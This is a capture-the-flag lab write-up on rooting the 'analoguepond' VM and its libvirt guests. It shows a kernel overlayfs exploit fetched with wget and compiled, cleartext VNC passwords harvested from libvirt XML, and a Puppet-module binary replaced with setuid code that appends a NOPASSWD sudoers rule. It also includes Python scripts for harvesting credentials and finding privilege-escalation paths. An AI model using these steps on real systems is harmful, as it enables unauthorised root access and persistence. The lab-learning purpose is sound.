Once in I was dropped into Eric’s home directory and had a couple of images as well as a binary named ‘spin’ which appeared to do just that, throw up a spinning cursor. Not useful…yet. I pulled down the images with SCP and checked for anything tasty in the exif data but came up empty, for now.

eric@analougepond:~$ pwd
/home/eric
eric@analougepond:~$ ls
reticulatingsplines.gif  

root@mrb3n:~# scp eric@analoguepond:/home/eric/reticulatingsplines.gif /var/www/html/
eric@analoguepond's password: 
reticulatingsplines.gif                                                                                                100%   29KB   2.4MB/s   00:00   

Hmm, no clue at this point but I’ll hang onto it, it may prove to be useful.

The readme mentioned VNC passwords, a netstat showed that VNC was present on the localhost on 5900 and 5901. Ifconfig showed a virtual bridge on the 192.168.122.0/24 subnet so we must be dealing with some libvirt emulation here. The readme also mentions multiple hosts, I am guessing 2 additional ones :).

eric@analougepond:~$ netstat -antp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0    408 192.168.85.128:22       192.168.85.129:55386    ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN
eric@analougepond:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:c9:a7:a4  
          inet addr:192.168.85.128  Bcast:192.168.85.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fec9:a7a4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6766 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5594 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:452860 (452.8 KB)  TX bytes:521927 (521.9 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:71 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6140 (6.1 KB)  TX bytes:6140 (6.1 KB)

virbr0    Link encap:Ethernet  HWaddr 52:54:00:b2:23:25  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:440 errors:0 dropped:0 overruns:0 frame:0
          TX packets:218 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24024 (24.0 KB)  TX bytes:17414 (17.4 KB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:6d:93:6a  
          inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:424 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1698 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:202700 (202.7 KB)  TX bytes:243315 (243.3 KB)

vnet1     Link encap:Ethernet  HWaddr fe:54:00:5b:05:f7  
          inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:707 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1919 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:194781 (194.7 KB)  TX bytes:285088 (285.0 KB)

Pulling up virsh and listing out the virtual hosts confirmed what we are dealing with.

virsh # list
 Id    Name                           State
----------------------------------------------------
 2     barringsbank                   running
 3     puppet                         running

Looking around the file system I really didn’t find much at first. Digging deeper I believe I found the locations of the VNC passwords but could not read them until I was root, will come back to that later.

Doing a uname -a showed that the kernel was likely vulnerable to the overlayfs root exploit:

eric@analoguepond:/var/lib/libvirt/network$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Several options come up in exploit-db:

root@kali2-CTP:/var/www/html# searchsploit overlayfs
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                        |  Path
                                                                                                                      | (/usr/share/exploitdb/platforms)
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
OverlayFS inode Security Checks - 'inode.c' Local Security Bypass                                                     | /linux/local/36571.sh
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation                        | /linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)   | /linux/local/37293.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)                                        | /linux/local/39166.c
Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)                                                             | /linux/local/39230.c
Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)                               | /linux/local/40688.rb

Let's go with 39166.c because it has worked for me several times before; the "4.3.3" in its title is the newest affected kernel and Ubuntu 14.04 is listed explicitly, so our 3.19 kernel is in range. We pull the file over to the target from the attacking box and compile it there.

eric@analoguepond:/tmp$ wget http://192.168.110.145/39166.c
--2017-06-26 17:16:53--  http://192.168.110.145/39166.c
Connecting to 192.168.110.145:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2681 (2.6K) [text/x-csrc]
Saving to: ‘39166.c’

100%[===============================================================================================================>] 2,681       --.-K/s   in 0s      

2017-06-26 17:16:53 (47.6 MB/s) - ‘39166.c’ saved [2681/2681]

eric@analoguepond:/tmp$ gcc 39166.c -o dobber
eric@analoguepond:/tmp$ chmod +x dobber 
eric@analoguepond:/tmp$ ./dobber

Running it gives us our root shell and, of course, our first troll flag.

root@analoguepond:/tmp# cd /root
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flag #1, so keep going.

The libvirt network definition in /var/lib/libvirt/network/default.xml gives us the IPs and hostnames of the other guests: the DHCP host reservations tie each guest's MAC address to a fixed IP.

root@analoguepond:/var/lib/libvirt/network# ls
default.xml
root@analoguepond:/var/lib/libvirt/network# cat default.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh net-edit default
or other application using the libvirt API.
-->

<networkstatus>
  <class_id bitmap='0-2'/>
  <floor sum='0'/>
  <network>
    <name>default</name>
    <uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid>
    <forward mode='nat'>
      <nat>
        <port start='1024' end='65535'/>
      </nat>
    </forward>
    <bridge name='virbr0' stp='on' delay='0'/>
    <mac address='52:54:00:b2:23:25'/>
    <ip address='192.168.122.1' netmask='255.255.255.0'>
      <dhcp>
        <range start='192.168.122.10' end='192.168.122.15'/>
        <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
        <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
      </dhcp>
    </ip>
  </network>
</networkstatus>

We can also confirm which hosts on the 192.168.122.0/24 virtual bridge are live with a little bash one-liner:

root@analoguepond:/var/lib/libvirt/network# for ip in 192.168.122.{1..254}; do ping -c 1 $ip > /dev/null && echo "${ip} is up"; done
192.168.122.1 is up
192.168.122.2 is up
192.168.122.3 is up

Next we need the per-domain qemu config files under /etc/libvirt/qemu, which carry the VNC passwords in the clear in the graphics element:

find / -name "*.xml"
...snip...

/etc/libvirt/qemu/barringsbank.xml
/etc/libvirt/qemu/puppet.xml


root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit barringsbank
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>barringsbank</name>
  <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/barringsbank-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:6d:93:6a'/>
      <source network='default'/>
      <model type='rtl8139'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x05' function='0x0'/>
    </memballoon>
  </devices>
</domain>

-------------------------------------------------

root@analoguepond:/etc/libvirt/qemu# cat puppet.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit puppet
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>puppet</name>
  <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
  <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='cdrom'/>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/puppet-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:5b:05:f7'/>
      <source network='default'/>
      <model type='virtio'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>
      <listen type='address' address='127.0.0.1'/>
    </graphics>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x04' function='0x0'/>
    </memballoon>
  </devices>
</domain>

Here we are:

‘memphistennessee’ and ‘sendyoubacktowalker’
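To make that harvesting repeatable, here is an added example (mine, not code from the original write-up) that parses libvirt's network status file and domain definitions the way we just did by hand: it joins each guest's NIC MAC address to its DHCP reservation to recover the IP, and pulls the VNC listen address, port and cleartext password out of the graphics element. The sample XML is a trimmed copy of the files shown above with only the elements the parser reads; on a real host you would read /var/lib/libvirt/network/default.xml and /etc/libvirt/qemu/*.xml as root.

```python
import xml.etree.ElementTree as ET

# Trimmed copies of the libvirt files shown in the write-up (constructed
# sample: only the elements the parser reads are kept).
NETWORK_XML = """<networkstatus>
  <network>
    <name>default</name>
    <bridge name='virbr0' stp='on' delay='0'/>
    <ip address='192.168.122.1' netmask='255.255.255.0'>
      <dhcp>
        <range start='192.168.122.10' end='192.168.122.15'/>
        <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
        <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
      </dhcp>
    </ip>
  </network>
</networkstatus>"""

BARRINGSBANK_XML = """<domain type='qemu'>
  <name>barringsbank</name>
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
  <devices>
    <interface type='network'>
      <mac address='52:54:00:6d:93:6a'/>
      <source network='default'/>
    </interface>
    <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>
  </devices>
</domain>"""

PUPPET_XML = """<domain type='qemu'>
  <name>puppet</name>
  <devices>
    <interface type='network'>
      <mac address='52:54:00:5b:05:f7'/>
      <source network='default'/>
    </interface>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>
      <listen type='address' address='127.0.0.1'/>
    </graphics>
  </devices>
</domain>"""


def dhcp_reservations(network_xml: str) -> dict:
    """Map MAC -> {name, ip} from the <dhcp><host> entries of a libvirt network.

    The on-disk status file wraps <network> in <networkstatus>; the output of
    `virsh net-dumpxml` is a bare <network>. Both are accepted.
    """
    root = ET.fromstring(network_xml)
    net = root if root.tag == "network" else root.find("network")
    return {
        h.get("mac").lower(): {"name": h.get("name"), "ip": h.get("ip")}
        for h in net.iter("host")
    }


def harvest_domain(domain_xml: str, reservations: dict) -> dict:
    """Pull name, description, NIC/IP pairs and VNC settings from one domain XML."""
    dom = ET.fromstring(domain_xml)
    info = {
        "name": dom.findtext("name"),
        "description": dom.findtext("description"),
        "nics": [],
        "vnc": None,
    }
    for iface in dom.iter("interface"):
        mac = iface.find("mac").get("address").lower()
        info["nics"].append({"mac": mac, "ip": reservations.get(mac, {}).get("ip")})

    g = dom.find("devices/graphics[@type='vnc']")
    if g is not None:
        # listen may be an attribute, a child <listen> element, or absent
        # (absent means the vnc_listen default from /etc/libvirt/qemu.conf,
        # which is 127.0.0.1 unless the admin changed it).
        listen_el = g.find("listen")
        listen = g.get("listen") or (listen_el.get("address") if listen_el is not None else None)
        port = int(g.get("port", "-1"))
        info["vnc"] = {
            "passwd": g.get("passwd"),
            "listen": listen,
            # port -1 with autoport=yes means libvirt picks 5900+ at boot; the
            # live port is only visible via `virsh vncdisplay <dom>` or the
            # -vnc argument of the running qemu process.
            "port": None if port < 0 else port,
        }
    return info


def harvest_all(network_xml: str, domain_xmls: list) -> list:
    """Parse the reservations once, then every domain against them."""
    res = dhcp_reservations(network_xml)
    return [harvest_domain(x, res) for x in domain_xmls]


if __name__ == "__main__":
    for d in harvest_all(NETWORK_XML, [BARRINGSBANK_XML, PUPPET_XML]):
        print(d["name"], [n["ip"] for n in d["nics"]], d["vnc"])
```

Two caveats worth knowing: virsh dumpxml hides the passwd attribute unless you pass --security-info, which is why reading the files on disk as root is the reliable route; and because both guests use autoport, the XML cannot tell you the live VNC port, so check the qemu command line (ps aux | grep vnc) or virsh vncdisplay before pointing a VNC client at it.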

So I next attempt to SSH to the puppet host and am presented with a possible username and a password hint in the SSH banner:

root@analoguepond:/etc/libvirt/qemu# ssh 192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------+
Passwords are very dated.. Removing spaces helps sandieshaw log in with her 
most famous song                                                            
+-----------------------------------------------+

Back to Google, because I clearly do not have knightmare's music knowledge, and I see that Sandie Shaw's most famous song was 'Puppet on a String'. At the time I wasn't sure whether the host name referred to the song or to the Puppet open-source configuration management tool. Knowing knightmare I figured it was the latter and that I was in for a wild ride.

I logged in with the password ‘puppetonastring’ and things started to get really interesting.

My suspicions were confirmed on checking out the /etc/puppet directory. Puppet is an open-source configuration management tool written in Ruby: a puppetmaster serves declarative 'modules' to agent hosts, which pull them down and apply them on each run. Port 8140 (the puppetmaster listener) and the modules/manifests trees under /etc/puppet confirmed that I was on the puppetmaster and that the other guest was an agent. Each module's manifests/init.pp declares a class listing the files, content, commands, permissions and services it manages, so browsing those tells you what every module does.

The nodes.pp and site.pp files in /etc/puppet/manifests show which modules are applied to which hosts on each Puppet run:

sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp 

node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  }
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp 
node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  include fiveeights
  }

In this case both hosts get the vulnhub module by inheriting the 'default' node; puppet additionally gets wiggle, and barringsbank gets fiveeights. Note that only site.pp includes fiveeights for barringsbank, the nodes.pp copy does not, so keep an eye on which file the master actually reads.

The vulnhub module is hilarious and is knightmare's revenge: a way of stripping out every convenient utility we usually rely on. Bye curl, wget, fetch. No nano! I started sweating, now I HAD to use vim. Thanks man! The rest of the module is pretty self-explanatory: it purges /etc/sudoers.d, re-pushes /etc/passwd, /etc/group and the TCP wrapper files from per-host copies kept in the module, and tries to restore sshd_config (though it writes to /etc/ssh/ssd_config, a path sshd never reads). The key detail is the 'puppet check in' cron entry, which runs puppet agent --test as root every 10 minutes. That tells us every host checks in with the puppetmaster every 10 minutes and applies anything new, like abused modules :).

sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp 
## Module to unwind changed #vulnhub people make.  This will unwind the most
## common vectors they sued to get at my other VMs

class vulnhub {

## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh)
$purge = [ "nano", "wget", "curl", "fetch","nmap", "netcat-traditional",
           "ncat", "netdiscover", "lftp" ]
  package { $purge:
  ensure => purged,
  }

## The encryption is still primative Egyptian
$theresas_nightmare = [ "cryptcat", "socat" ]
  package { $theresas_nightmare:
  ensure => present,
  }

## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub)
file { "/etc/sudoers.d":
  ensure => "directory",
  recurse => true,
  purge   => true,
  force   => true,
  owner   => root,
  group   => root,
  mode    => 0755,
  source  => "puppet:///modules/vulnhub/sudoers.d",
  }

## revert /etc/passwd (Hey Rasta_Mouse!)
file {'/etc/passwd':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-passwd",
  }

## and /etc/group (Hello to you cmaddy)
file {'/etc/group':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-group",
  }

## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!)
file {'/etc/ssh/ssd_config':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-sshd_config",
  notify => Service["ssh"],
  }

## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like
## Gibson
cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

## Everyone forbidden by default
file {'/etc/hosts.deny':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/hosts.deny",
  }

## Firewall off to only specific hosts
file {'/etc/hosts.allow':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-hosts.allow",
  }


## Don't fill up the disk
tidy { "/var/lib/puppet/reports":
   age     => "1h",
   recurse => true,
  }

## Changing openssh config requires restart
service { 'ssh':
  ensure      => running,
  enable      => true,
  hasstatus   => true,
  hasrestart  => true,
  }

}

The wiggle module's files directory holds the spin binary and its source. spin.c is just a console spinner, so there is nothing worth reversing in it, but the binary will come into play soon.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls
spin  spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c 
#include <stdio.h>
#include <unistd.h>

void
advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);
    pos = (pos + 1) % nbars;
}

int
main() {
    while (1) {
        advance_spinner();
        usleep(300);
    }

    return 0;
}

The wiggle manifest is more interesting and is likely our priv esc. On every Puppet run the agent ensures /tmp/spin exists with the content of the module's spin file (re-copying it whenever the checksum differs), owned by root:root with mode 4755, i.e. setuid root.

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }
}

The spin binary is copied from /etc/puppet/modules/wiggle/files, and luckily that directory is group-writable by sandieshaw and the spin file itself is owned by her, so we can replace it with something nasty.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -lah
total 732K
drwxrwxr-x 2 root       sandieshaw 4.0K Dec 18 18:42 .
drwxr-xr-x 4 root       root       4.0K Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw 717K Dec 17 11:51 spin
-rw-rw-r-- 1 sandieshaw sandieshaw  376 Dec 17 11:52 spin.c
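Checking for exactly this pattern is worth automating on any puppetmaster you land on, so here is an added example (mine, not from the original write-up) that walks the modules tree, picks out every file resource whose mode carries the setuid or setgid bit, resolves its puppet:/// source to the file under the module's files directory, and reports whether the current user can change that file or replace it through its directory. The two manifest samples are copied from the files shown above; the exists/writable hooks exist only so the logic can be tested without a Puppet tree, and the classic /etc/puppet/modules/<module>/{manifests,files} layout is assumed.

```python
import os
import re
from pathlib import Path

# Constructed sample: the wiggle manifest from the puppet host, as shown above.
WIGGLE_INIT_PP = """\
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }
}
"""

# One resource from the vulnhub manifest: root-owned, but no setuid/setgid bit.
HOSTS_DENY_PP = """\
class vulnhub {
file {'/etc/hosts.deny':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/hosts.deny",
  }
}
"""

FILE_RESOURCE = re.compile(r"file\s*\{(?P<body>.*?)\n\s*\}", re.S)
TITLE = re.compile(r"^\s*\[?\s*['\"]([^'\"]+)['\"]")
PARAM = {
    k: re.compile(rf"\b{k}\s*=>\s*['\"]?([^,;'\"\s]+)")
    for k in ("mode", "owner", "source")
}
SETUID_OR_SETGID = 0o6000


def privileged_file_resources(manifest: str) -> list:
    """Return the file resources whose mode carries the setuid or setgid bit."""
    found = []
    for m in FILE_RESOURCE.finditer(manifest):
        body = m.group("body")
        params = {}
        for key, rx in PARAM.items():
            hit = rx.search(body)
            params[key] = hit.group(1) if hit else None
        mode = params["mode"]
        if not mode or not re.fullmatch(r"[0-7]{3,4}", mode):
            continue
        if int(mode, 8) & SETUID_OR_SETGID:
            t = TITLE.match(body)
            found.append({"title": t.group(1) if t else None, **params})
    return found


def source_to_path(puppet_root: str, source: str):
    """puppet:///modules/<mod>/<rest> is served from <root>/modules/<mod>/files/<rest>."""
    prefix = "puppet:///modules/"
    if not source or not source.startswith(prefix) or "$" in source:
        return None  # not a module file, or templated with ${facts}: resolve by hand
    mod, _, rest = source[len(prefix):].partition("/")
    return os.path.join(puppet_root, "modules", mod, "files", rest)


def source_state(path, *, exists=os.path.exists,
                 writable=lambda p: os.access(p, os.W_OK)) -> str:
    """'writable' if we can change the file or swap it out via its directory.

    Run this as the low-privileged user; as root os.access() says yes to
    everything. exists/writable are injectable purely for testing.
    """
    if not exists(path):
        return "missing"
    if writable(path) or writable(os.path.dirname(path)):
        return "writable"
    return "readonly"


def scan(puppet_root: str) -> list:
    """Walk <root>/modules/*/manifests/*.pp and report every privileged file
    resource together with whether its backing file is ours to replace."""
    report = []
    for pp in Path(puppet_root, "modules").glob("*/manifests/*.pp"):
        for r in privileged_file_resources(pp.read_text(errors="replace")):
            path = source_to_path(puppet_root, r["source"])
            r.update(manifest=str(pp), path=path,
                     state=source_state(path) if path else "unresolved")
            report.append(r)
    return report


if __name__ == "__main__":
    for r in scan("/etc/puppet"):
        print(f'{r["mode"]} {r["owner"]} {r["title"]} <- {r["path"]} [{r["state"]}]')
```

On the puppet host this prints one line for /tmp/spin with state writable, which is the whole finding: a root-owned setuid binary is being rebuilt every 10 minutes from a file an unprivileged user controls. The regexes parse the simple resource layout used here and are not a Puppet DSL parser; nested or heavily templated manifests will need a second look by hand.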

I create my own version of the spin binary which lets me run a command as root, like so:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Drop-in replacement for spin. Puppet installs it root:root with mode
 * 4755, so it starts with an effective uid of 0; setuid(0) makes the real
 * uid 0 as well so the shell spawned by system() keeps root. */
int main(void)
{
  if (setuid(0) != 0) {
    perror("setuid");
    return 1;
  }
  /* rootme.sh appends a NOPASSWD sudo rule for sandieshaw (see below) */
  system("/home/sandieshaw/rootme.sh");
  return 0;
}

rootme.sh just appends a passwordless sudo rule for sandieshaw. Appending to /etc/sudoers itself, rather than dropping a file into /etc/sudoers.d, matters here: the vulnhub module purges /etc/sudoers.d on every run but leaves /etc/sudoers alone, so given everything knightmare stripped away this is the easiest route:

echo "sandieshaw ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers

I compile it offline. I could scp it to the host, but I'm lazy, so I base64-encode it offline and decode it on the target:

cat spin  | openssl base64 | awk 'BEGIN{ORS="";} {print}'

...snip...

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ echo "huge base64 string" | base64 -d > spin
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ file spin
spin: ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped

We know from earlier that the Puppet run happens every 10 minutes, so I set everything up and grab some coffee.

cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

After a bit I check /tmp and see from the size and timestamp that Puppet has replaced the spin binary with mine, and I am able to sudo to root without a password like a champion.

sandieshaw@puppet:/tmp$ ls -la
total 12
drwxrwxrwt  2 root root 4096 Jun 26 18:20 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root   57 Jun 26 18:11 spin
sandieshaw@puppet:/tmp$ ls -la
total 16
drwxrwxrwt  2 root root 4096 Jun 26 18:21 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root 7452 Jun 26 18:21 spin

sandieshaw@puppet:/tmp$ ./spin
sandieshaw@puppet:/tmp$ sudo -s
root@puppet:/tmp#

Once root, I check the root directory for a flag or the next clue and am presented with several files.

root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls
flag1.txt.0xff  jim  melvin
root@puppet:/root/protovision# cat jim
Mr Potato Head! Backdoors are not a...
root@puppet:/root/protovision# cat melvin 
Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# file flag1.txt.0xff 
flag1.txt.0xff: ASCII text, with very long lines
root@puppet:/root/protovision# cat flag1.txt.0xff 
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861

So we have a hex string, which xxd decodes to a reversed base64 string, and that eventually yields a YouTube link:

root@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r
